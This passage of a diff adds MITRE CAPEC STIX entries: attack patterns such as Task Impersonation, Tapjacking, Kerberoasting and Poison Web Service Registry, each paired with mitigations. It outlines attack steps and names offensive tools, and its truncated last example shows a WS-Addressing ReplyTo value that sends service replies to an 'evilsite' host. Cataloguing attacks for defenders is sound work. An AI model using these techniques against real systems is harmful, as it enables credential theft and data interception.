"https://capec.mitre.org/data/definitions/503.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "WebView Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads.", + "id": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-503-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1ba307f2-f881-482f-aff4-e2af10977631", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "spec_version": "2.1", + "target_ref": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.", + "external_references": [ + { + "external_id": "CAPEC-504", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Masquerading: Masquerade Task or Service", + "external_id": "T1036.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/004" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Task Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

    2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

    2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
", + "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06" + ], + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials.", + "The user's privileges allow them to execute certain tasks with elevated privileges." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate task." + ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help.", + "id": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-504-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3528ad55-1737-4d7b-b627-6716bbe22c84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "spec_version": "2.1", + "target_ref": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.", + "external_references": [ + { + "external_id": "CAPEC-505", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/505.html" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Scheme Squatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.", + "id": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-505-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39c2732f-5fa7-44ba-9dab-86cc03c05888", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "spec_version": "2.1", + "target_ref": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.", + "external_references": [ + { + "external_id": "CAPEC-506", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/506.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Marcus Niemietz, Jorg Schwenk, UI Redressing Attacks on Android Devices, 2012, Horst Gortz Institute for IT-Security", + "external_id": "REF-436", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/ad-12/Niemietz/bh-ad-12-androidmarcus_niemietz-WP.pdf" + }, + { + "description": "David Richardson, Look-10-007 - Tapjacking, 2010, Lookout Mobile Security", + "external_id": "REF-437", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lookout.com/look-10-007-tapjacking/" + } + ], + "id": "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Tapjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This pattern of attack requires the ability to execute a malicious application on the user's device. This malicious application is used to present the interface to the user and make the attack possible." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains physical access to a system or device through theft of the item. Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.", + "external_references": [ + { + "external_id": "CAPEC-507", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/507.html" + } + ], + "id": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Physical Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "This type of attack requires the existence of a physical target that an adversary believes hosts something of value." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented.", + "id": "course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-507-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--150a1d7c-14ac-46f7-9e73-619a5595c6db", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "spec_version": "2.1", + "target_ref": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In a shoulder surfing attack, an adversary observes an unaware individual's keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content \"over the victim's shoulder\", as implied by the name of this attack.", + "external_references": [ + { + "external_id": "CAPEC-508", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/508.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + } + ], + "id": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Shoulder Surfing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_example_instances": [ + "An adversary can capture a target's banking credentials and transfer money to adversary-controlled accounts.", + "An adversary observes the target's mobile device lock screen pattern/passcode and then steals the device, which can now be unlocked.", + "An insider could obtain database credentials for an application and sell the credentials on the black market.", + "An insider overhears a conversation pertaining to classified information, which could then be posted on an anonymous online forum." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, in order to observe their screen or conversation. This may not be the case if the adversary is able to record the target and obtain sensitive information upon review of the recording." + ], + "x_capec_skills_required": { + "Low": "In most cases, an adversary can simply observe and retain the desired information." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing or viewing sensitive information in public areas.", + "id": "course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--190133dc-952f-4cbc-864c-a85cc28a04fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "spec_version": "2.1", + "target_ref": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pertaining to insider threats, ensure that sensitive information is not displayed to nor discussed around individuals without need-to-know access to said information.", + "id": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c24c04d4-0e8d-43c3-bd68-829df5ceff0a", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "spec_version": "2.1", + "target_ref": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.", + "external_references": [ + { + "external_id": "CAPEC-509", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/509.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Steal or Forge Kerberos Tickets:Kerberoasting", + "external_id": "T1558.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558/003" + }, + { + "description": "Jeff Warren, Extracting Service Account Passwords with Kerberoasting, 2017--05---09", + "external_id": "REF-559", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Kerberoasting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for user accounts with set SPN values

    2. Techniques
    These can be found via Powershell or LDAP queries, as well as enumerating startup name accounts and other means.

  2. Request service tickets

    3. Techniques
    Using user account's SPN value, request other service tickets from Active Directory

Experiment

  1. Extract ticket and save to disk

    2. Techniques
    Certain tools like Mimikatz can extract local tickets and save them to memory/disk.

Exploit

  1. Crack the encrypted ticket to harvest plain text credentials

    2. Techniques
    Leverage a brute force application/script on the hashed value offline until cracked. The shorter the password, the easier it is to crack.
", + "x_capec_prerequisites": [ + "The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.", + "The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).", + "The adversary requires a brute force tool." + ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--445d759f-d21c-4325-a510-bd6e24de839d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust password policy for service accounts. Passwords should be of adequate length and complexity, and they should expire after a period of time.", + "id": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2a47d13-bffb-4f8b-94f6-aeeb94afc153", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.", + "id": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8893293-d02b-4ee1-9f85-56386750d82f", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + "spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.", + "id": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee90edd2-2b62-435a-9e2e-f24f212d13ba", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.", + "external_references": [ + { + "external_id": "CAPEC-51", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/51.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + } + ], + "id": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Poison Web Service Registry", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.\n http://example.com/Message\n http://valid.example/validClient\n http://evilsite/evilClient\n 